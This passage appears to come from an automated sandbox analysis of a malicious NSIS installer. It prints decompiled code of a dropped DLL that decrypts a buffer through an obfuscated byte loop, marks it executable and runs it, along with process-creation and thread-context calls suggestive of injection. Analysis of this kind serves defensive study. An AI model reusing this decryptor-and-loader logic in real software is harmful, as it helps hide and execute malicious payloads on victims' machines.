						 *0x6f1f7fe8 =  *0x6f1f7fe8 & 0x000000ff ^  *0x6f1f7360;
						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) >> 0x00000005 | ( *0x6f1f7fe8 & 0x000000ff) << 0x00000003;
						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) + 0x94;
						 *0x6f1f7fe8 =  !( *0x6f1f7fe8 & 0x000000ff);
						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) +  *0x6f1f7360;
						 *0x6f1f7fe8 =  !( *0x6f1f7fe8 & 0x000000ff);
						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) +  *0x6f1f7360;
						 *0x6f1f7fe8 =  ~( *0x6f1f7fe8 & 0x000000ff);
						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) + 0x92;
						 *0x6f1f7fe8 =  !( *0x6f1f7fe8 & 0x000000ff);
						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) >> 0x00000007 | ( *0x6f1f7fe8 & 0x000000ff) << 0x00000001;
						 *0x6f1f7fe8 =  *0x6f1f7fe8 & 0x000000ff ^  *0x6f1f7360;
						 *0x6f1f7fe8 =  ~( *0x6f1f7fe8 & 0x000000ff);
						 *0x6f1f7fe8 =  *0x6f1f7fe8 & 0x000000ff ^ 0x00000049;
						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) - 0x6d;
						 *0x6f1f7fe8 =  !( *0x6f1f7fe8 & 0x000000ff);
						 *0x6f1f7fe8 =  *0x6f1f7fe8 & 0x000000ff ^ 0x00000098;
						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) -  *0x6f1f7360;
						 *0x6f1f7fe8 =  !( *0x6f1f7fe8 & 0x000000ff);
						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) -  *0x6f1f7360;
						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) >> 0x00000003 | ( *0x6f1f7fe8 & 0x000000ff) << 0x00000005;
						 *0x6f1f7fe8 =  !( *0x6f1f7fe8 & 0x000000ff);
						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) >> 0x00000007 | ( *0x6f1f7fe8 & 0x000000ff) << 0x00000001;
						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) + 0xcd;
						 *0x6f1f7fe8 =  *0x6f1f7fe8 & 0x000000ff ^ 0x000000a5;
						 *0x6f1f7fe8 = ( *0x6f1f7fe8 & 0x000000ff) -  *0x6f1f7360;
						 *0x6f1f7fe8 =  !( *0x6f1f7fe8 & 0x000000ff);
						 *0x6f1f7fe8 =  ~( *0x6f1f7fe8 & 0x000000ff);
						 *0x6f1f7fe8 =  *0x6f1f7fe8 & 0x000000ff ^  *0x6f1f7360;
						_t123 =  *0x6f1f7360; // 0x13c5
						_t51 =  *0x6f1f7fe8; // 0x0
						 *((char*)( &E6F1F2000 + _t123)) = _t51;
						_t89 =  *0x6f1f7360; // 0x13c5
						 *0x6f1f7360 = _t89 + 1;
					}
					VirtualProtect( &E6F1F2000, 0x13c5, 0x40, 0x6f1f7fe4);
					E6F1F2000(); // executed
					return 0;
				}
				return 0;
			}











                                                                                              0x6f1df530
                                                                                              0x6f1df54d
                                                                                              0x6f1df567
                                                                                              0x6f1df57b
                                                                                              0x6f1df587
                                                                                              0x6f1df595
                                                                                              0x6f1df59b
                                                                                              0x6f1df5a3
                                                                                              0x6f1df5be
                                                                                              0x6f1df5ce
                                                                                              0x6f1df5d4
                                                                                              0x6f1df5da
                                                                                              0x6f1df5ec
                                                                                              0x6f1df5fb
                                                                                              0x6f1df60e
                                                                                              0x6f1df61c
                                                                                              0x6f1df62c
                                                                                              0x6f1df63f
                                                                                              0x6f1df65a
                                                                                              0x6f1df669
                                                                                              0x6f1df678
                                                                                              0x6f1df694
                                                                                              0x6f1df6a7
                                                                                              0x6f1df6ba
                                                                                              0x6f1df6d6
                                                                                              0x6f1df6e8
                                                                                              0x6f1df6f7
                                                                                              0x6f1df709
                                                                                              0x6f1df718
                                                                                              0x6f1df72b
                                                                                              0x6f1df739
                                                                                              0x6f1df74c
                                                                                              0x6f1df75b
                                                                                              0x6f1df775
                                                                                              0x6f1df788
                                                                                              0x6f1df796
                                                                                              0x6f1df7a6
                                                                                              0x6f1df7b6
                                                                                              0x6f1df7c4
                                                                                              0x6f1df7d7
                                                                                              0x6f1df7ea
                                                                                              0x6f1df7f8
                                                                                              0x6f1df80b
                                                                                              0x6f1df827
                                                                                              0x6f1df835
                                                                                              0x6f1df850
                                                                                              0x6f1df862
                                                                                              0x6f1df874
                                                                                              0x6f1df886
                                                                                              0x6f1df895
                                                                                              0x6f1df8a4
                                                                                              0x6f1df8b6
                                                                                              0x6f1df8bc
                                                                                              0x6f1df8c2
                                                                                              0x6f1df8c7
                                                                                              0x6f1df5af
                                                                                              0x6f1df5b8
                                                                                              0x6f1df5b8
                                                                                              0x6f1df8e3
                                                                                              0x6f1df8eb
                                                                                              0x00000000
                                                                                              0x6f1df8ed
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • LoadLibraryW.KERNEL32(kernel32.dll,VirtualProtect), ref: 6F1DF540
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6F1DF547
                                                                                              • LoadLibraryW.KERNEL32(kernel32.dll,VirtualAlloc), ref: 6F1DF55A
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6F1DF561
                                                                                              • VirtualAlloc.KERNEL32(00000000,11E1A300,00003000,00000004), ref: 6F1DF578
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc$AllocVirtual
                                                                                              • String ID: VirtualAlloc$VirtualProtect$kernel32.dll$kernel32.dll
                                                                                              • API String ID: 1786449878-3286849197
                                                                                              • Opcode ID: b154c96b4fed8138e62b8367961d22918d5e2acc897aaf96e27056e34e31d782
                                                                                              • Instruction ID: 77c1d7af3b5bd067cb76ea106acd5514b3936d466963a8683a6bcae1834c3bc9
                                                                                              • Opcode Fuzzy Hash: b154c96b4fed8138e62b8367961d22918d5e2acc897aaf96e27056e34e31d782
                                                                                              • Instruction Fuzzy Hash: BD91FD5402FAE09ADF0EE77A78A1D603FE157679F2718688BE4F5862C7C12442F4DB21
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401734, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 60%
                                                                                              			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029E8(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E0040548B(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E0040541E(E0040592B(0x409b78, "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409b78);
					E0040592B();
				}
				E00405B89(0x409b78);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405C22(0x409b78);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E004055E3(0x409b78);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405602(0x409b78, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404CC9(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42ebe8;
						goto L32;
					} else {
						E0040592B(0x40a378, 0x42f000);
						E0040592B(0x42f000, 0x409b78);
						E0040594D(_t75, 0x40a378, 0x409b78, "C:\Users\alfons\AppData\Local\Temp\nswBB9.tmp\rgsbzeog.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E0040592B(0x42f000, 0x40a378);
						_t62 = E004051EC("C:\Users\alfons\AppData\Local\Temp\nswBB9.tmp\rgsbzeog.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42ebe8 =  &( *0x42ebe8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b78);
								_push(0xfffffffa);
								E00404CC9();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404CC9(0xffffffea,  *(_t85 - 8));
				 *0x42ec14 =  *0x42ec14 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 0x34));
				_push( *((intOrPtr*)(_t85 - 0x1c)));
				_t43 = E00402E44(); // executed
				 *0x42ec14 =  *0x42ec14 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E0040594D(_t75, _t80, 0x409b78, 0x409b78, 0xffffffee);
					} else {
						E0040594D(_t75, _t80, 0x409b78, 0x409b78, 0xffffffe9);
						lstrcatA(0x409b78,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b78);
					E004051EC();
					goto L29;
				}
				goto L33;
			}
















                                                                                              0x00401734
                                                                                              0x0040173b
                                                                                              0x00401744
                                                                                              0x00401747
                                                                                              0x0040174a
                                                                                              0x0040174f
                                                                                              0x00401757
                                                                                              0x00401773
                                                                                              0x00401759
                                                                                              0x00401759
                                                                                              0x0040175a
                                                                                              0x0040175a
                                                                                              0x00401779
                                                                                              0x00401783
                                                                                              0x00401783
                                                                                              0x00401787
                                                                                              0x0040178a
                                                                                              0x0040178f
                                                                                              0x00401791
                                                                                              0x00401793
                                                                                              0x00401798
                                                                                              0x00401798
                                                                                              0x004017a3
                                                                                              0x004017a3
                                                                                              0x004017b4
                                                                                              0x004017b6
                                                                                              0x004017b6
                                                                                              0x004017b7
                                                                                              0x004017b7
                                                                                              0x004017ba
                                                                                              0x004017bd
                                                                                              0x004017c0
                                                                                              0x004017c0
                                                                                              0x004017c7
                                                                                              0x004017d6
                                                                                              0x004017db
                                                                                              0x004017de
                                                                                              0x004017e1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004017e3
                                                                                              0x004017e6
                                                                                              0x00401840
                                                                                              0x00401845
                                                                                              0x004015a8
                                                                                              0x0040264e
                                                                                              0x0040264e
                                                                                              0x0040287d
                                                                                              0x00402880
                                                                                              0x00402880
                                                                                              0x00000000
                                                                                              0x004017e8
                                                                                              0x004017ee
                                                                                              0x004017f9
                                                                                              0x00401806
                                                                                              0x00401811
                                                                                              0x00401827
                                                                                              0x00401827
                                                                                              0x0040182a
                                                                                              0x00000000
                                                                                              0x00401830
                                                                                              0x00401830
                                                                                              0x00401831
                                                                                              0x0040184e
                                                                                              0x00402886
                                                                                              0x00402886
                                                                                              0x00402886
                                                                                              0x00401833
                                                                                              0x00401833
                                                                                              0x00401834
                                                                                              0x00401492
                                                                                              0x00402200
                                                                                              0x00402200
                                                                                              0x00402200
                                                                                              0x00401831
                                                                                              0x0040182a
                                                                                              0x00402888
                                                                                              0x0040288c
                                                                                              0x0040288c
                                                                                              0x0040185e
                                                                                              0x00401863
                                                                                              0x00401869
                                                                                              0x0040186a
                                                                                              0x0040186b
                                                                                              0x0040186e
                                                                                              0x00401871
                                                                                              0x00401876
                                                                                              0x0040187c
                                                                                              0x00401880
                                                                                              0x00401882
                                                                                              0x0040188a
                                                                                              0x00401896
                                                                                              0x00401884
                                                                                              0x00401884
                                                                                              0x00401888
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00401888
                                                                                              0x0040189f
                                                                                              0x004018a5
                                                                                              0x004018a7
                                                                                              0x00000000
                                                                                              0x004018ad
                                                                                              0x004018ad
                                                                                              0x004018b0
                                                                                              0x004018c8
                                                                                              0x004018b2
                                                                                              0x004018b5
                                                                                              0x004018be
                                                                                              0x004018be
                                                                                              0x004018cd
                                                                                              0x004018d2
                                                                                              0x004021fb
                                                                                              0x00000000
                                                                                              0x004021fb
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • lstrcatA.KERNEL32(00000000,00000000,ivvzb,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                                                                                              • CompareFileTime.KERNEL32(-00000014,?,ivvzb,ivvzb,00000000,00000000,ivvzb,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                                                                                                • Part of subcall function 0040592B: lstrcpynA.KERNEL32(?,?,00000400,00403151,qjsvdse Setup,NSIS Error), ref: 00405938
                                                                                                • Part of subcall function 00404CC9: lstrlenA.KERNEL32(004297B0,00000000,0041B694,7519EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                                                                                                • Part of subcall function 00404CC9: lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041B694,7519EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                                                                                                • Part of subcall function 00404CC9: lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041B694,7519EA30), ref: 00404D25
                                                                                                • Part of subcall function 00404CC9: SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                                                                                                • Part of subcall function 00404CC9: SendMessageA.USER32 ref: 00404D5D
                                                                                                • Part of subcall function 00404CC9: SendMessageA.USER32 ref: 00404D77
                                                                                                • Part of subcall function 00404CC9: SendMessageA.USER32 ref: 00404D85
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nswBB9.tmp$C:\Users\user\AppData\Local\Temp\nswBB9.tmp\rgsbzeog.dll$ivvzb
                                                                                              • API String ID: 1941528284-530247106
                                                                                              • Opcode ID: 9637652f00c021062d2dbe4245cc16957b59b03da3b62afee8cfd87e020825ba
                                                                                              • Instruction ID: 57f74d31a3863b2a576bf3fc3f2571be4e71849821accf25204d9298bb77468e
                                                                                              • Opcode Fuzzy Hash: 9637652f00c021062d2dbe4245cc16957b59b03da3b62afee8cfd87e020825ba
                                                                                              • Instruction Fuzzy Hash: 6C41B471900515FACF10BBB5DD46EAF36A9EF01368B20433BF511B21E1D63C8E418AAE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402E44, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 174fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 95%
                                                                                              			E00402E44(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t67;
				void* _t68;
				long _t74;
				intOrPtr _t79;
				long _t80;
				void* _t82;
				int _t84;
				intOrPtr _t95;
				void* _t97;
				void* _t100;
				long _t101;
				signed int _t102;
				long _t103;
				int _t104;
				intOrPtr _t105;
				long _t106;
				void* _t107;

				_t102 = _a16;
				_t97 = _a12;
				_v12 = _t102;
				if(_t97 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t97;
				if(_t97 == 0) {
					_v16 = 0x418b80;
				}
				_t65 = _a4;
				if(_a4 >= 0) {
					_t95 =  *0x42ebb8; // 0x3591e
					E00403098(_t95 + _t65);
				}
				_t67 = E00403066( &_a16, 4); // executed
				if(_t67 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t97 == 0) {
							while(_a16 > 0) {
								_t103 = _v12;
								if(_a16 < _t103) {
									_t103 = _a16;
								}
								if(E00403066(0x414b80, _t103) == 0) {
									goto L34;
								} else {
									if(WriteFile(_a8, 0x414b80, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t68);
										return _t68;
									} else {
										_v8 = _v8 + _t103;
										_a16 = _a16 - _t103;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t102) {
							_t102 = _a16;
						}
						if(E00403066(_t97, _t102) != 0) {
							_v8 = _t102;
							goto L45;
						} else {
							goto L34;
						}
					}
					_t74 = GetTickCount();
					 *0x40b4e4 =  *0x40b4e4 & 0x00000000;
					 *0x40b4e0 =  *0x40b4e0 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t74;
					 *0x40afc8 = 8;
					 *0x414b70 = 0x40cb68;
					 *0x414b6c = 0x40cb68;
					 *0x414b68 = 0x414b68;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t104 = 0x4000;
						if(_a16 < 0x4000) {
							_t104 = _a16;
						}
						if(E00403066(0x414b80, _t104) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t104;
						 *0x40afb8 = 0x414b80;
						 *0x40afbc = _t104;
						while(1) {
							_t100 = _v16;
							 *0x40afc0 = _t100;
							 *0x40afc4 = _v12;
							_t79 = E00405D23(0x40afb8);
							_v28 = _t79;
							if(_t79 < 0) {
								break;
							}
							_t105 =  *0x40afc0; // 0x41b694
							_t106 = _t105 - _t100;
							_t80 = GetTickCount();
							_t101 = _t80;
							if(( *0x42ec14 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t107 = _t107 + 0xc;
								E00404CC9(0,  &_v92);
								_v20 = _t101;
							}
							if(_t106 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_t82 =  *0x40afc0; // 0x41b694
									_v8 = _v8 + _t106;
									_v12 = _v12 - _t106;
									_v16 = _t82;
									L24:
									if(_v28 != 1) {
										continue;
									}
									goto L45;
								}
								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
								if(_t84 == 0 || _v24 != _t106) {
									goto L29;
								} else {
									_v8 = _v8 + _t106;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}



























                                                                                              0x00402e4c
                                                                                              0x00402e50
                                                                                              0x00402e53
                                                                                              0x00402e58
                                                                                              0x00402e5a
                                                                                              0x00402e5a
                                                                                              0x00402e61
                                                                                              0x00402e65
                                                                                              0x00402e6a
                                                                                              0x00402e6c
                                                                                              0x00402e6c
                                                                                              0x00402e73
                                                                                              0x00402e78
                                                                                              0x00402e7a
                                                                                              0x00402e83
                                                                                              0x00402e83
                                                                                              0x00402e8e
                                                                                              0x00402e95
                                                                                              0x00403011
                                                                                              0x00403011
                                                                                              0x00000000
                                                                                              0x00402e9b
                                                                                              0x00402e9f
                                                                                              0x00402ffc
                                                                                              0x00403051
                                                                                              0x00403016
                                                                                              0x0040301c
                                                                                              0x0040301e
                                                                                              0x0040301e
                                                                                              0x0040302f
                                                                                              0x00000000
                                                                                              0x00403031
                                                                                              0x00403044
                                                                                              0x00402ff6
                                                                                              0x00402ff6
                                                                                              0x00403013
                                                                                              0x00403013
                                                                                              0x00000000
                                                                                              0x0040304b
                                                                                              0x0040304b
                                                                                              0x0040304e
                                                                                              0x00000000
                                                                                              0x0040304e
                                                                                              0x00403044
                                                                                              0x0040302f
                                                                                              0x0040305c
                                                                                              0x00000000
                                                                                              0x0040305c
                                                                                              0x00403001
                                                                                              0x00403003
                                                                                              0x00403003
                                                                                              0x0040300f
                                                                                              0x00403059
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040300f
                                                                                              0x00402eab
                                                                                              0x00402ead
                                                                                              0x00402eb4
                                                                                              0x00402ebb
                                                                                              0x00402ebb
                                                                                              0x00402ec2
                                                                                              0x00402eca
                                                                                              0x00402ed4
                                                                                              0x00402ed9
                                                                                              0x00402ee1
                                                                                              0x00402eeb
                                                                                              0x00402eee
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402ef4
                                                                                              0x00402ef4
                                                                                              0x00402ef4
                                                                                              0x00402efc
                                                                                              0x00402efe
                                                                                              0x00402efe
                                                                                              0x00402f0f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402f15
                                                                                              0x00402f18
                                                                                              0x00402f1e
                                                                                              0x00402f24
                                                                                              0x00402f24
                                                                                              0x00402f2f
                                                                                              0x00402f35
                                                                                              0x00402f3a
                                                                                              0x00402f41
                                                                                              0x00402f44
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402f4a
                                                                                              0x00402f50
                                                                                              0x00402f52
                                                                                              0x00402f5b
                                                                                              0x00402f5d
                                                                                              0x00402f8b
                                                                                              0x00402f91
                                                                                              0x00402f9a
                                                                                              0x00402f9f
                                                                                              0x00402f9f
                                                                                              0x00402fa6
                                                                                              0x00402fea
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402fa8
                                                                                              0x00402fab
                                                                                              0x00402fcd
                                                                                              0x00402fd2
                                                                                              0x00402fd5
                                                                                              0x00402fd8
                                                                                              0x00402fdb
                                                                                              0x00402fdf
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402fe5
                                                                                              0x00402fb9
                                                                                              0x00402fc1
                                                                                              0x00000000
                                                                                              0x00402fc8
                                                                                              0x00402fc8
                                                                                              0x00000000
                                                                                              0x00402fc8
                                                                                              0x00402fc1
                                                                                              0x00402fa6
                                                                                              0x00402ff2
                                                                                              0x00000000
                                                                                              0x00402ff2
                                                                                              0x00000000
                                                                                              0x00402ef4

                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 00402EAB
                                                                                              • GetTickCount.KERNEL32 ref: 00402F52
                                                                                              • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F7B
                                                                                              • wsprintfA.USER32 ref: 00402F8B
                                                                                              • WriteFile.KERNEL32(00000000,00000000,0041B694,7FFFFFFF,00000000), ref: 00402FB9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: CountTick$FileWritewsprintf
                                                                                              • String ID: ... %d%%$ingTypeW
                                                                                              • API String ID: 4209647438-1588361529
                                                                                              • Opcode ID: 82a9aedbd2f3b533e53c55a0f3032eb9fe86cf46c86e88442e97a38cb8fe0156
                                                                                              • Instruction ID: 9e0124e4ae7d277b0b54c9942477664c6d45ab1b3c5c68ad5b6cbbf63d84754e
                                                                                              • Opcode Fuzzy Hash: 82a9aedbd2f3b533e53c55a0f3032eb9fe86cf46c86e88442e97a38cb8fe0156
                                                                                              • Instruction Fuzzy Hash: A5619E7180120ADBDF10DF65DA48A9F7BB8BB44365F10413BE910B72C4C778DA51DBAA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1F30FB, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 237processthreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateProcessW.KERNEL32(?,00000000), ref: 6F1F323F
                                                                                              • GetThreadContext.KERNEL32(?,00010007), ref: 6F1F3262
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: ContextCreateProcessThread
                                                                                              • String ID: D
                                                                                              • API String ID: 2843130473-2746444292
                                                                                              • Opcode ID: c9220ceb5afd7ae1c55745b9682b90ddab10de5a600337f464f58a91d5c72a72
                                                                                              • Instruction ID: 90e558c9943ddb4828b2eb7431aa72eb05ed8dd256ad0e19c84ec43f3c75cdb2
                                                                                              • Opcode Fuzzy Hash: c9220ceb5afd7ae1c55745b9682b90ddab10de5a600337f464f58a91d5c72a72
                                                                                              • Instruction Fuzzy Hash: 91A10571E45249EFDB44DFA8C981BAEBBF5BF08384F104169E515EB290D730AA62CF11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 57%
                                                                                              			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t25;
				void* _t26;
				struct HINSTANCE__* _t29;
				CHAR* _t31;
				intOrPtr* _t32;
				void* _t33;

				_t26 = __ebx;
				asm("sbb eax, 0x42ec18");
				 *(_t33 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L14:
					E00401423();
					L15:
					 *0x42ebe8 =  *0x42ebe8 +  *(_t33 - 4);
					return 0;
				}
				_t31 = E004029E8(0xfffffff0);
				 *(_t33 + 8) = E004029E8(1);
				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
					_t29 = _t18;
					if(_t29 == _t26) {
						_push(0xfffffff6);
						goto L14;
					}
					L4:
					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
					if(_t32 == _t26) {
						E00404CC9(0xfffffff7,  *(_t33 + 8));
					} else {
						 *(_t33 - 4) = _t26;
